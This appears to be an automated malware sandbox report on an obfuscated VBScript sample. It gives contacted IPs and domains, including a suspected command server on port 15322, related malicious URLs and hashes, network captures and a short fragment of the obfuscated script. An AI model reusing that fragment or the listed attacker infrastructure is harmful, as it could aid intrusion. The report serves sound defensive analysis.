          https://s4.histav2wscript.exe, 00000000.00000003.2155969410.0000021326C3F000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://histats.com/d_openedjgwscript.exe, 00000000.00000002.2157030674.0000021326C46000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://s4.histats.com/owscript.exe, 00000000.00000003.2155993130.0000021328DB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155460887.0000021328DB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2157396890.0000021328DB9000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              https://histats.com/d_openedw2wscript.exe, 00000000.00000003.2155460887.0000021328D82000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2157396890.0000021328D87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155993130.0000021328D87000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://s4.histats.com/swscript.exe, 00000000.00000002.2157030674.0000021326C46000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155969410.0000021326C3F000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  http://www.microsoft.cotwscript.exe, 00000000.00000002.2157512064.0000021328E53000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://histats.com/d_openedlwscript.exe, 00000000.00000003.2156569055.0000021326CAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155775019.0000021326CAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156362022.0000021326CAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156423007.0000021326CAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2157099379.0000021326CAF000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://histats.com/d_opened-wscript.exe, 00000000.00000002.2157235442.0000021326F35000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://histats.com/d_openedPwscript.exe, 00000000.00000002.2157030674.0000021326C46000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155969410.0000021326C3F000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://s4.histatl2wscript.exe, 00000000.00000002.2157030674.0000021326C46000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155969410.0000021326C3F000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://s4.histats.com/stats/0.php?4926118&wscript.exe, 00000000.00000003.2155969410.0000021326C3F000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://s4.histats.com/Cwscript.exe, 00000000.00000003.2155993130.0000021328DB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155460887.0000021328DB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2157396890.0000021328DB9000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://histats.com/d_openedwscript.exe, 00000000.00000003.2155969410.0000021326C3F000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://histats.com/d_openedhwscript.exe, 00000000.00000002.2157512064.0000021328E53000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://s4.histawscript.exe, 00000000.00000002.2157030674.0000021326C46000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                45.93.9.167
                                		host85500.infoRussian Federation
                                		44676VMAGE-ASRUfalse
                                149.56.240.127
                                		s4.histats.comCanada
                                		16276OVHFRfalse

                                General Information

                                Joe Sandbox version:42.0.0 Malachite
                                Analysis ID:1607480
                                Start date and time:2025-02-05 16:19:18 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 4m 48s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:8
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:analysis.vbs
                                Detection:MAL
                                Classification:mal84.expl.evad.winVBS@8/5@2/2
                                EGA Information:Failed
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Found application associated with file extension: .vbs
                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                • Excluded IPs from analysis (whitelisted): 13.107.253.45, 20.12.23.50
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                10:20:18API Interceptor45x Sleep call for process: powershell.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                45.93.9.167CfF7MWq7aG.htmlGet hashmaliciousUnknownBrowse
                                  149.56.240.127https://fooofooofooo.b-cdn.net/Get hashmaliciousTechSupportScamBrowse
                                    https://alluc.co/watch-movies/passengers.htmlGet hashmaliciousUnknownBrowse
                                      https://hy.markkasmick.click/cx/tbSgVco_akr35UznLBgMmL_dGwr4A9B_vyg2WwEB0w1LRjKjQMyEnB89mCfTRy8oqnbpdFunqinBhx0TsHvSJdUHnbksc3kdcKecoDvVHa5LAm46at*Mm*Ro3D2CHoEu2bmOqt4Ic8O_7AE7Igwgbi5c8zmZf6Fqp*_XqcjREPr7609oL7vKm8FfjGLhMetr2oxtpR3ywH4BUElgc7EI7usxj8CJYEUMktwlb7YUzPvYQ7P1PilEV0LqiXI5sm6QVF4ZGl5TIXhnQLOG0kl6WQ0miiZysBfhaNojnPTUvisUUkwOp2fYTxkXEIhZ7ESJ7qXYLxQbm*y4RJVeZZZ3RY5rX8W5t8cudSM9Zx7UaxgLH56aOv81v4QfUnzroT9v*7LR3jPEjz*YXr2LwuykYQnzvV6boWl*o*gU4jkPE6MocRRlRoC6uUx2e1Wseo8MqGWTT2uXo4HbQDneiMF84sQ34*3TnbAxXWu8xLbb_mAOQxUTA3T5TUUZKeU3ziolM8TSVV5Y5LQTFGtNArddwJKdWCb_cLYMxUJpZ3cqM_AGet hashmaliciousUnknownBrowse
                                        http://football-booster.freevisit1.com/hs-football.php?live=Greendale%20vs%20Milwaukee%20LutheranGet hashmaliciousUnknownBrowse
                                          http://moremashup.comGet hashmaliciousUnknownBrowse
                                            https://circleoftoast.blogspot.comGet hashmaliciousUnknownBrowse
                                              http://instaofficiallog.blogspot.com/Get hashmaliciousHTMLPhisherBrowse
                                                https://www.google.com/url?rct=j&sa=t&url=https://mencsom.click/call/aixheijmur&ct=ga&cd=CAEYASoTNTAxNTU4MzAyNDMwMDkzOTY4MTIaNzRmM2RkZTE1NWFkOWUzMzpjb206ZW46VVM&usg=AOvVaw0__SVRP8owZu02bhN2WI1SGet hashmaliciousUnknownBrowse
                                                  https://netflixfreefiresportlive.blogspot.com/Get hashmaliciousHTMLPhisherBrowse
                                                    http://s953497062.onlinehome.us/fixit?_recovrAccountGet hashmaliciousUnknownBrowse

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      s4.histats.comCfF7MWq7aG.htmlGet hashmaliciousUnknownBrowse
                                                      • 142.4.219.198
                                                      https://getwellslogsnowonline.vercel.app/Get hashmaliciousUnknownBrowse
                                                      • 149.56.240.132
                                                      https://fooofooofooo.b-cdn.net/Get hashmaliciousTechSupportScamBrowse
                                                      • 149.56.240.127
                                                      El3cE5jq1L.pdfGet hashmaliciousUnknownBrowse
                                                      • 149.56.240.129
                                                      http://home45insurance.blogspot.comGet hashmaliciousUnknownBrowse
                                                      • 54.39.128.162
                                                      http://jinoodle-polopol.b-cdn.net/Get hashmaliciousTechSupportScamBrowse
                                                      • 149.56.240.27
                                                      https://eightdays-pdfnow.b-cdn.net/Get hashmaliciousTechSupportScamBrowse
                                                      • 149.56.240.130
                                                      http://nomads-primes-pdfs.b-cdn.net/Get hashmaliciousTechSupportScamBrowse
                                                      • 149.56.240.27
                                                      https://suman006723213.github.io/garena.reward.ff/Get hashmaliciousHTMLPhisherBrowse
                                                      • 149.56.240.27
                                                      https://199.188.109.181Get hashmaliciousUnknownBrowse
                                                      • 158.69.254.144

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      OVHFRvessels details.exeGet hashmaliciousCryptOne, MassLogger RATBrowse
                                                      • 51.81.194.202
                                                      https://www.mccallionstaffing.com/search-jobs/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                      • 54.38.113.6
                                                      CfF7MWq7aG.htmlGet hashmaliciousUnknownBrowse
                                                      • 142.4.219.198
                                                      https://westallisheating.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                      • 51.81.55.251
                                                      Bank Slip pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • 54.39.129.84
                                                      https://eventmidasbuyz.merchats.com/Get hashmaliciousHTMLPhisherBrowse
                                                      • 46.105.222.82
                                                      res.arm5.elfGet hashmaliciousUnknownBrowse
                                                      • 149.60.1.98
                                                      res.spc.elfGet hashmaliciousUnknownBrowse
                                                      • 188.165.189.140
                                                      https://je.engl6.shop/webro-DPD-notificare/Get hashmaliciousUnknownBrowse
                                                      • 54.38.113.8
                                                      https://tt.vg/notificareDPD02Get hashmaliciousUnknownBrowse
                                                      • 51.178.195.217
                                                      VMAGE-ASRU05epqpFYdF.exeGet hashmaliciousPureLog Stealer, SmokeLoaderBrowse
                                                      • 2.59.163.71
                                                      _30343667.jsGet hashmaliciousPureLog Stealer, SmokeLoaderBrowse
                                                      • 2.59.163.71
                                                      CfF7MWq7aG.htmlGet hashmaliciousUnknownBrowse
                                                      • 45.93.9.167
                                                      svc2.exeGet hashmaliciousSmokeLoaderBrowse
                                                      • 2.59.163.71
                                                      file.htaGet hashmaliciousSmokeLoaderBrowse
                                                      • 2.59.163.172
                                                      #U0414#U043e#U0433#U043e#U0432i#U0440_#U043f#U043e#U0441#U0442#U0430#U0432#U043a#U0438.jsGet hashmaliciousSmokeLoaderBrowse
                                                      • 2.59.163.172
                                                      powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                      • 45.130.170.23
                                                      JzDYvnUh8s.exeGet hashmaliciousRedLineBrowse
                                                      • 5.182.36.101
                                                      Salary Amendment.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                      • 2.59.163.43
                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                      • 193.43.91.119

                                                      JA3 Fingerprints

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      37f463bf4616ecd445d4a1937da06e19vessels details.exeGet hashmaliciousCryptOne, MassLogger RATBrowse
                                                      • 149.56.240.127
                                                      https://gruposiblings.com/facturacion.phpGet hashmaliciousUnknownBrowse
                                                      • 149.56.240.127
                                                      New Order_pdf_006534325.exeGet hashmaliciousGuLoaderBrowse
                                                      • 149.56.240.127
                                                      FC4311009.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 149.56.240.127
                                                      New Order List Inquiry #657833.exeGet hashmaliciousDiscord Token Stealer, GuLoaderBrowse
                                                      • 149.56.240.127
                                                      PROFORMA INVOICE - AL AHWAL AL JAYEDAH TECH.CONT.L.L.C.exeGet hashmaliciousGuLoaderBrowse
                                                      • 149.56.240.127
                                                      FAKTURA 012025.exeGet hashmaliciousGuLoaderBrowse
                                                      • 149.56.240.127
                                                      URGENT Quotation.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 149.56.240.127
                                                      Factura.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 149.56.240.127
                                                      FAKTURA 012025.exeGet hashmaliciousGuLoaderBrowse
                                                      • 149.56.240.127

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\0[1].htm

                                                      Download File
                                                      Process:C:\Windows\System32\wscript.exe
                                                      File Type:ASCII text
                                                      Category:dropped
                                                      Size (bytes):376
                                                      Entropy (8bit):5.175134110355963
                                                      Encrypted:false
                                                      SSDEEP:6:51DMwYb13LkVVXI8mgO9lVhnmUqZzwGdDVTYqL1+LD+mMkuc1zlCBbAm+RbDRWP/:51DrYb13QvuHnmVZkGdDJH10D+xc15C5
                                                      MD5:C2B26B17141E97DA490556030D44F1C3
                                                      SHA1:FE0D875538ED94E607D4F3FEFECFC8F797FF3EA9
                                                      SHA-256:892D55861A7789EEC2CAD963B875D9EBF537FF3698F08D0349CE86395D224262
                                                      SHA-512:67DB732D53C80D1BF30EF6EE75A73ED69ED071AC4E84FF86789A16DFAE810BEF0D2CEF472D6E8624247196334B7F48A65158552FC8A012F968ECDD332A840235
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:_HST_cntval="Initializing..";chfh(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);.b.async="async";b.type="text/javascript";var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(b,a);}catch(e){}}();

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):5829
                                                      Entropy (8bit):4.901113710259376
                                                      Encrypted:false
                                                      SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                      MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                      SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                      SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                      SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):0.34726597513537405
                                                      Encrypted:false
                                                      SSDEEP:3:Nlll:Nll
                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                      Malicious:false
                                                      Preview:@...e...........................................................

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ime1wocq.hyz.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r4gxrv5v.agl.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      Static File Info

                                                      General

                                                      File type:ASCII text, with very long lines (16795), with no line terminators
                                                      Entropy (8bit):4.071901946369593
                                                      TrID:
                                                        File name:analysis.vbs
                                                        File size:16'795 bytes
                                                        MD5:f88fb28db55f790656578d4fa2a18281
                                                        SHA1:6c14e47dbc336247d467a3fa9c77ec7ffa2450b1
                                                        SHA256:834024ad5c7dd595bcb62b79d6a13dc654cbe0805e8e29dba9a3590834a576ba
                                                        SHA512:a7903a20c6f5548a38a29235db211e068c0a3a210d3af2503b3d13187d107f8437abcf9be7f2ebbb55792354233bd9e8b5e99e1b5f095364865a482fd5eb8e49
                                                        SSDEEP:384:OS6QdlNQq4KP2zhsS6XzypeKxch6pUkRjf+wxib:HBQqZP+mw4
                                                        TLSH:4D72CC596E448F439C2D2E4FE0B03A2AC3EDACA5673C94D99F2D3F801D4C1527A7C999
                                                        File Content Preview:tAsSgEzAlTuwmUnGAzqqlJCVcYSW = Split("FYsZKpnyor EYsZKpnyach QSUAcZglxxrrActOEgXFj IYsZKpnyn SYsZKpnyplit(""492/YsZKpny3sK390/2sK-8+125sK308/2sK796/4sK23+176sK392/2sK112+87sK468/4sK334/2sK530-344sK-155+355sK606/3sK18+176sK564-378sK533-416sK471-308sK90+96s

                                                        File Icon

                                                        Icon Hash:68d69b8f86ab9a86

                                                        Network Behavior

                                                        Download Network PCAP: filteredfull

                                                        Network Port Distribution

                                                        • Total Packets: 20
                                                        • 15322 undefined
                                                        • 443 (HTTPS)
                                                        • 53 (DNS)
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Feb 5, 2025 16:20:17.595820904 CET49704443192.168.2.5149.56.240.127
                                                        Feb 5, 2025 16:20:17.595875025 CET44349704149.56.240.127192.168.2.5
                                                        Feb 5, 2025 16:20:17.595969915 CET49704443192.168.2.5149.56.240.127
                                                        Feb 5, 2025 16:20:17.603233099 CET49704443192.168.2.5149.56.240.127
                                                        Feb 5, 2025 16:20:17.603247881 CET44349704149.56.240.127192.168.2.5
                                                        Feb 5, 2025 16:20:18.202172995 CET44349704149.56.240.127192.168.2.5
                                                        Feb 5, 2025 16:20:18.202313900 CET49704443192.168.2.5149.56.240.127
                                                        Feb 5, 2025 16:20:18.252660036 CET49704443192.168.2.5149.56.240.127
                                                        Feb 5, 2025 16:20:18.252688885 CET44349704149.56.240.127192.168.2.5
                                                        Feb 5, 2025 16:20:18.252990961 CET44349704149.56.240.127192.168.2.5
                                                        Feb 5, 2025 16:20:18.253063917 CET49704443192.168.2.5149.56.240.127
                                                        Feb 5, 2025 16:20:18.255259991 CET49704443192.168.2.5149.56.240.127
                                                        Feb 5, 2025 16:20:18.295336962 CET44349704149.56.240.127192.168.2.5
                                                        Feb 5, 2025 16:20:18.361311913 CET44349704149.56.240.127192.168.2.5
                                                        Feb 5, 2025 16:20:18.361419916 CET44349704149.56.240.127192.168.2.5
                                                        Feb 5, 2025 16:20:18.361526012 CET49704443192.168.2.5149.56.240.127
                                                        Feb 5, 2025 16:20:18.379185915 CET49704443192.168.2.5149.56.240.127
                                                        Feb 5, 2025 16:20:18.379223108 CET44349704149.56.240.127192.168.2.5
                                                        Feb 5, 2025 16:20:19.413455963 CET4970515322192.168.2.545.93.9.167
                                                        Feb 5, 2025 16:20:19.418328047 CET153224970545.93.9.167192.168.2.5
                                                        Feb 5, 2025 16:20:19.418411016 CET4970515322192.168.2.545.93.9.167
                                                        Feb 5, 2025 16:20:19.489339113 CET4970515322192.168.2.545.93.9.167
                                                        Feb 5, 2025 16:20:19.495076895 CET153224970545.93.9.167192.168.2.5
                                                        Feb 5, 2025 16:20:20.093193054 CET153224970545.93.9.167192.168.2.5
                                                        Feb 5, 2025 16:20:20.093215942 CET153224970545.93.9.167192.168.2.5
                                                        Feb 5, 2025 16:20:20.093295097 CET4970515322192.168.2.545.93.9.167
                                                        Feb 5, 2025 16:20:20.206953049 CET4970515322192.168.2.545.93.9.167
                                                        Feb 5, 2025 16:20:20.211811066 CET153224970545.93.9.167192.168.2.5
                                                        Feb 5, 2025 16:20:20.409662962 CET153224970545.93.9.167192.168.2.5
                                                        Feb 5, 2025 16:20:20.428282976 CET4970515322192.168.2.545.93.9.167
                                                        Feb 5, 2025 16:20:20.433203936 CET153224970545.93.9.167192.168.2.5
                                                        Feb 5, 2025 16:21:59.352375031 CET4970515322192.168.2.545.93.9.167
                                                        Feb 5, 2025 16:21:59.663949966 CET4970515322192.168.2.545.93.9.167
                                                        Feb 5, 2025 16:22:00.041023016 CET153224970545.93.9.167192.168.2.5
                                                        Feb 5, 2025 16:22:00.042548895 CET153224970545.93.9.167192.168.2.5
                                                        Feb 5, 2025 16:22:00.042865038 CET4970515322192.168.2.545.93.9.167
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Feb 5, 2025 16:20:17.583128929 CET5928653192.168.2.51.1.1.1
                                                        Feb 5, 2025 16:20:17.589663982 CET53592861.1.1.1192.168.2.5
                                                        Feb 5, 2025 16:20:19.330755949 CET5142253192.168.2.51.1.1.1
                                                        Feb 5, 2025 16:20:19.366413116 CET53514221.1.1.1192.168.2.5

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Feb 5, 2025 16:20:17.583128929 CET192.168.2.51.1.1.10x13ccStandard query (0)s4.histats.comA (IP address)IN (0x0001)false
                                                        Feb 5, 2025 16:20:19.330755949 CET192.168.2.51.1.1.10xe775Standard query (0)host85500.infoA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Feb 5, 2025 16:20:17.589663982 CET1.1.1.1192.168.2.50x13ccNo error (0)s4.histats.com149.56.240.127A (IP address)IN (0x0001)false
                                                        Feb 5, 2025 16:20:17.589663982 CET1.1.1.1192.168.2.50x13ccNo error (0)s4.histats.com54.39.156.32A (IP address)IN (0x0001)false
                                                        Feb 5, 2025 16:20:17.589663982 CET1.1.1.1192.168.2.50x13ccNo error (0)s4.histats.com149.56.240.31A (IP address)IN (0x0001)false
                                                        Feb 5, 2025 16:20:17.589663982 CET1.1.1.1192.168.2.50x13ccNo error (0)s4.histats.com54.39.128.162A (IP address)IN (0x0001)false
                                                        Feb 5, 2025 16:20:17.589663982 CET1.1.1.1192.168.2.50x13ccNo error (0)s4.histats.com54.39.128.117A (IP address)IN (0x0001)false
                                                        Feb 5, 2025 16:20:17.589663982 CET1.1.1.1192.168.2.50x13ccNo error (0)s4.histats.com149.56.240.130A (IP address)IN (0x0001)false
                                                        Feb 5, 2025 16:20:17.589663982 CET1.1.1.1192.168.2.50x13ccNo error (0)s4.histats.com142.4.219.198A (IP address)IN (0x0001)false
                                                        Feb 5, 2025 16:20:17.589663982 CET1.1.1.1192.168.2.50x13ccNo error (0)s4.histats.com149.56.240.131A (IP address)IN (0x0001)false
                                                        Feb 5, 2025 16:20:17.589663982 CET1.1.1.1192.168.2.50x13ccNo error (0)s4.histats.com158.69.254.144A (IP address)IN (0x0001)false
                                                        Feb 5, 2025 16:20:17.589663982 CET1.1.1.1192.168.2.50x13ccNo error (0)s4.histats.com149.56.240.132A (IP address)IN (0x0001)false
                                                        Feb 5, 2025 16:20:17.589663982 CET1.1.1.1192.168.2.50x13ccNo error (0)s4.histats.com149.56.240.129A (IP address)IN (0x0001)false
                                                        Feb 5, 2025 16:20:17.589663982 CET1.1.1.1192.168.2.50x13ccNo error (0)s4.histats.com149.56.240.128A (IP address)IN (0x0001)false
                                                        Feb 5, 2025 16:20:17.589663982 CET1.1.1.1192.168.2.50x13ccNo error (0)s4.histats.com149.56.240.27A (IP address)IN (0x0001)false
                                                        Feb 5, 2025 16:20:19.366413116 CET1.1.1.1192.168.2.50xe775No error (0)host85500.info45.93.9.167A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • s4.histats.com

                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.549704149.56.240.1274435608C:\Windows\System32\wscript.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-02-05 15:20:18 UTC385OUTGET /stats/0.php?4926118&@f16&@g1&@h1&@i1&@vhttps://histats.com/d_opened HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-ch
                                                        UA-CPU: AMD64
                                                        Accept-Encoding: gzip, deflate
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                        Host: s4.histats.com
                                                        Connection: Keep-Alive
                                                        2025-02-05 15:20:18 UTC135INHTTP/1.1 200 OK
                                                        Date: Wed, 05 Feb 2025 15:20:18 GMT
                                                        Content-Type: text/html;charset=UTF-8
                                                        Content-Length: 376
                                                        Connection: close
                                                        2025-02-05 15:20:18 UTC376INData Raw: 5f 48 53 54 5f 63 6e 74 76 61 6c 3d 22 49 6e 69 74 69 61 6c 69 7a 69 6e 67 2e 2e 22 3b 63 68 66 68 28 5f 48 53 54 5f 63 6e 74 76 61 6c 29 3b 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 62 2e 73 72 63 3d 22 2f 2f 65 2e 64 74 73 63 6f 75 74 2e 63 6f 6d 2f 65 2f 3f 76 3d 31 61 26 70 69 64 3d 35 32 30 30 26 73 69 74 65 3d 31 26 6c 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2b 22 26 6a 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 29 3b 0a 62 2e 61 73 79 6e 63 3d 22 61 73 79 6e 63 22
                                                        Data Ascii: _HST_cntval="Initializing..";chfh(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);b.async="async"


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        • File
                                                        • Registry

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:10:20:09
                                                        Start date:05/02/2025
